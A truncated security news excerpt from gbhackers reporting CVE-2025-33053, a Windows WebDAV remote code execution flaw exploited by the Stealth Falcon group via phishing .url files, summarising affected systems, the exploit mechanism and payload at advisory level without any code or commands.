WebDAV Remote Code Execution 0-Day Actively Exploited — PoC Released
gbhackers
A critical zero-day vulnerability in Microsoft’s Web Distributed Authoring and Versioning (WebDAV) protocol, tracked as CVE-2025-33053, has been actively exploited by the advanced persistent threat (APT) group Stealth Falcon since March 2025.
The flaw, patched in June’s Patch Tuesday, enables remote code execution (RCE) via manipulated .url shortcut files and has been linked to attacks against Middle Eastern defense sectors.
Vulnerability Overview
According to the report, CVE-2025-33053 (CVSS 8.8) allows attackers to hijack the working directory of legitimate Windows tools like iediagcmd.exe, forcing them to execute malicious payloads from attacker-controlled WebDAV servers.
Key details:
| Component | Details |
|---|---|
| Affected Systems | Windows 10/11, Server 2016–2025, and legacy unsupported versions |
| Exploit Mechanism | Abuse of WebDAV’s UNC path handling to redirect WorkingDirectory |
| Initial Vector | Phishing emails with .url files masquerading as PDFs |
| Primary Payload | Horus Agent (Mythic framework-based implant with anti-analysis techniques) |
Technical ...
Copyright of this story solely belongs to gbhackers . To see the full text click HERE